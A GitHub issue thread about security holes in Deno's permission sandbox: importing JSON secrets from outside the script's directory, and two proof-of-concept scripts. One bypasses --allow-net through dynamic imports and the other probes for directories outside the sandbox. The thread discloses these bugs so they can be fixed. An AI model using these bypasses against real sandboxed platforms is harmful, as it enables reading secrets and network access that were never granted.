In the current version of Deno (0.24) it is possible to import a module from outside the directory of the running script:
import * as secrets from "../../../elsewhere/config.json";
My understanding is that this is justified because a malicious script cannot know where it is going to be run, and therefore an attempt to load a relative path as above will almost always result in Deno exiting with an error.
Although it's true that in some uses of Deno a malicious script author cannot know where a JSON file with secrets might be located relative to where it is run, there is one situation where this can be known: if Deno is used as the sandbox subsystem of a larger system, then Deno will always be called in the same way (predictable cwd and path to potential secrets).
Imagine for example an application platform that uses Deno as its sandbox. It has the following data directory:
- data-dir/
  | - config.json  // includes api keys and other secrets
  | - more stuff.../
  | - untrusted-app-code/
  |   | - malicious-app/
The application platform would probably call Deno with very limited permissions, and it certainly will not provide an --allow-read permission that includes config.json.
However the malicious app will not need that. If it's designed to run on the platform, it can read config.json like this:
import * as platform_config from '../../config.json';
I believe Deno should disallow relative static imports outside of the main script's directory unless --allow-read allows it.
Thanks,
✌️
Yes it's a good point. If we are to take security seriously we can't allow reading random JSON...
I would say instead it might be more reasonable to require --allow-read for JSON imports (since they are data).
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
--allow-read makes sense for JSON imports. Is there a difference in local or remote? --allow-read implies local only. We should consider passing it to the TS compiler too so it can set allowJson on the compiler config.
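As a side note, the TypeScript compiler option that actually enables importing .json files is resolveJsonModule (I don't believe an allowJson flag exists); a tsconfig fragment along these lines is what would need to be set:

```json
{
  "compilerOptions": {
    "resolveJsonModule": true
  }
}
```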
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
I think the relevant thread is: https://github.com/w3c/webcomponents/issues/839
Btw, in case you'd like to weigh in, there's a proposal coming out of this that could be of interest to deno as well. Looks like _module attributes_ could serve as a mechanism to pass permissions.
@kevinkassimo --allow-read for JSON imports seems reasonable, since this is basically an easier way to read data (plus some type info as a bonus). @kitsonk yeah, --allow-read implies local, but for remote JSON imports I would expect to need --allow-net for the same reason.
Update: I mean I would want to know that my program is "importing" a random JSON API or something.
Also, I see two other arguments for requiring --allow-net for remote JSON imports:
Thinking about the CORS analogy, @ry do you think that importing JSON by a module in the same directory, i.e. import * as x from "./bare-file-name.json"; should be allowed by default, with --allow-read/--allow-net required for directories other than "./"? (Not just outside directories reached with "..", but also nested ones inside, to avoid problems with symlinks pointing to directories outside.)
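The containment rule being discussed could be sketched roughly as follows. This is a minimal illustration, not Deno's actual implementation; isWithinRoot is a hypothetical helper, and a real check would additionally call realpath() on the resolved target to defeat the symlink problem mentioned above.

```typescript
import * as path from "node:path";

// Hypothetical helper: does an import, resolved against the importing
// module's directory, stay inside the script root? (A production version
// would also realpath() the target so symlinks can't escape the root.)
function isWithinRoot(
  root: string,
  importerDir: string,
  specifier: string,
): boolean {
  const resolved = path.posix.resolve(importerDir, specifier);
  const rel = path.posix.relative(root, resolved);
  return rel !== "" && !rel.startsWith("..") && !path.posix.isAbsolute(rel);
}

console.log(isWithinRoot("/app", "/app/src", "./util.json")); // true
console.log(isWithinRoot("/app", "/app/src", "../../config.json")); // false
```

With a rule like this, the '../../config.json' import from the malicious-app example would require --allow-read, while sibling imports under the entry point keep working.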
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
There is a really interesting "HTTP 203" episode where they get into imports from the browser and in particular why JSON import was dropped.
https://www.youtube.com/watch?v=jG7VfbqqTGw
I would say instead it might be more reasonable to require --allow-read for JSON imports (since they are data)
I think a local import of any type (JS/TS/WASM/JSON/CSS/...) that is outside the root of the script (meaning: it probably wasn't downloaded along with the script) should require an --allow-read permission.
Even if JS/TS are "just code" usually and will be limited by the permissions given to the called script, that's not a reason to give a script the ability to execute them and get their results.
JS can be data too: think of webpack.config.js.
Another advantage is that this way static and dynamic local imports are beholden to the same rules, which makes things easier to reason about.
In the end, since Deno is meant to be safe a script should have only the most limited set of default permissions to run. Being able to import a JS from outside its directory is not a good default.
Just my $0.02.
Any real-world app is going to need the ability to import a file from a sibling directory. How do you decide where the module's root is, anyway? In Node, it's easy because you can just look upwards in the filesystem until you find a package.json. I guess in Deno, the best we could do is use the directory of the entry point. But that wouldn't work for all project structures, such as files in bin loading files from lib, which is a common pattern in Node.
I guess in Deno, the best we could do is use the directory of the entry point.
I think that's the idea.
But that wouldn't work for all project structures, such as files in bin loading files from lib, which is a common pattern in Node.
I would think Deno projects would be structured so that all files necessary for code to run will be at or below the entry-point.
That import isn't routed through the general access checks is concerning. Makes me wonder: what else isn't?
You can also bypass --allow-net:
poc.js:
const encoder = new TextEncoder();
Deno.writeFileSync(
  "/tmp/make-request.ts",
  encoder.encode("import * as foo from 'http://example.com/foobar';"),
);
while (true) {
  try {
    await import("/tmp/make-request.ts");
  } catch (e) {}
}
% deno --allow-read=/tmp --allow-write=/tmp poc.js
Compile file:///tmp/make-request.ts
Download http://example.com/foobar
Compile file:///tmp/make-request.ts
Download http://example.com/foobar
Compile file:///tmp/make-request.ts
Download http://example.com/foobar
Compile file:///tmp/make-request.ts
Download http://example.com/foobar
Compile file:///tmp/make-request.ts
Download http://example.com/foobar
...
(Sure, it's only a DoS-ish / timing attack thing, but still...)
Also, it's not enough to just solve JSON. You can also check for existence of directories outside of your sandbox:
poc2.js:
const encoder = new TextEncoder();

async function dir_exists(path) {
  const tmpFile = '/tmp/' + Math.random() + '.ts';
  Deno.writeFileSync(tmpFile, encoder.encode(`import * as foo from '${path}'`));
  try {
    await import(tmpFile);
  } catch (e) {
    return e.message.includes('Is a directory');
  }
}

console.log('jaka', await dir_exists('/Users/jaka'));
console.log('mike', await dir_exists('/Users/mike'));
% deno --allow-read=/tmp --allow-write=/tmp poc2.js
Compile file:///tmp/0.05196201107122267.ts
jaka true
Compile file:///tmp/0.8575097111751213.ts
mike false
I propose everything is just made explicit: require --allow-read for the source directory. I would also require --allow-net for imports from the internet.
Without any arguments, it should be as secure as a stock V8 or a browser.
All fs/net access should be centrally routed, or some contributor in 1 year will introduce a vuln.
For a real non-sandboxed app, you'll need a wrapper anyway (a shebang doesn't work for anything non-trivial, e.g. you can't specify a relative import map). The only thing affected will be the sexy one-liners.
Meanwhile, the other way around, securing things when defaults are loose, is nearly impossible.
@jakajancar Good example - this is a problem.
What if alternatively we required a special flag for dynamic imports?
This looks like a bug in the implementation of the TS compiler; we explicitly check each dynamic import from V8 for permissions, either read or net depending on the scheme. In the provided example the request is made by the TS compiler, which is privileged and doesn't check permissions for downloaded files; we should change that.
The same could happen in JS. You write a file with a static URL import, then dynamically import that file. This allows a request to be made to a dynamically defined URL without --allow-net.
So TS compiler runs outside the sandbox?
The same could happen in JS. You write a file with a static URL import, then dynamically import that file. This allows a request to be made to a dynamically defined URL without --allow-net.
No, V8 will call ModuleLoader.load() with the dynamic_import argument set to true for each recursive module, so it will properly check permissions for remote modules.
So TS compiler runs outside the sandbox?
The TS compiler is run in a separate isolate and thus a separate thread. It is considered privileged because it can load source files and write to the disk cache. It looks like the case of dynamic import was not covered with a permission check, but it should be an easy fix with the example you provided 👍
I don't think it is a loophole in TypeScript. Something like import(tmpFile) doesn't actually get analysed by the TypeScript compiler, because it cannot be statically determined what is happening with the dynamic import. It is true that if a dynamic import can be statically determined, the TypeScript compiler will request it as a module to analyse its type information, and I don't believe we can determine that easily, but it _should_ still follow the same process when being injected into the isolate as other dynamic import()s.
Looking at the example, it is a .js file which is trying to dynamically import a .ts file, which then gets loaded by the compiler and effectively gets into an infinite loop of loading files for dependency analysis: the TypeScript file brings in the JavaScript file, which brings in the TypeScript file, and so on.
The fix would be to keep a set of dependencies and short circuit the cyclical nature of the importing. I will try to fix it today/tomorrow.
I don't see an infinite loop in my example. I just put a while (true) loop there to indicate a DoS. Without it, it terminates just fine.
Ok, then the problem isn't with the compiler per se, @bartlomieju. It appears that with a dynamic import we aren't properly awaiting the compilation to complete and updating the cache, because it should compile once and then be a cache hit on every subsequent import.
Any while (true) is a potential DoS, irrespective of it doing something else.
Could these recent findings be moved to their own issue? Thanks.
@teleclimber Yes, these are very different and important issues. I created https://github.com/denoland/deno/issues/4383 for the --allow-net bypass problem.
Closed in #5037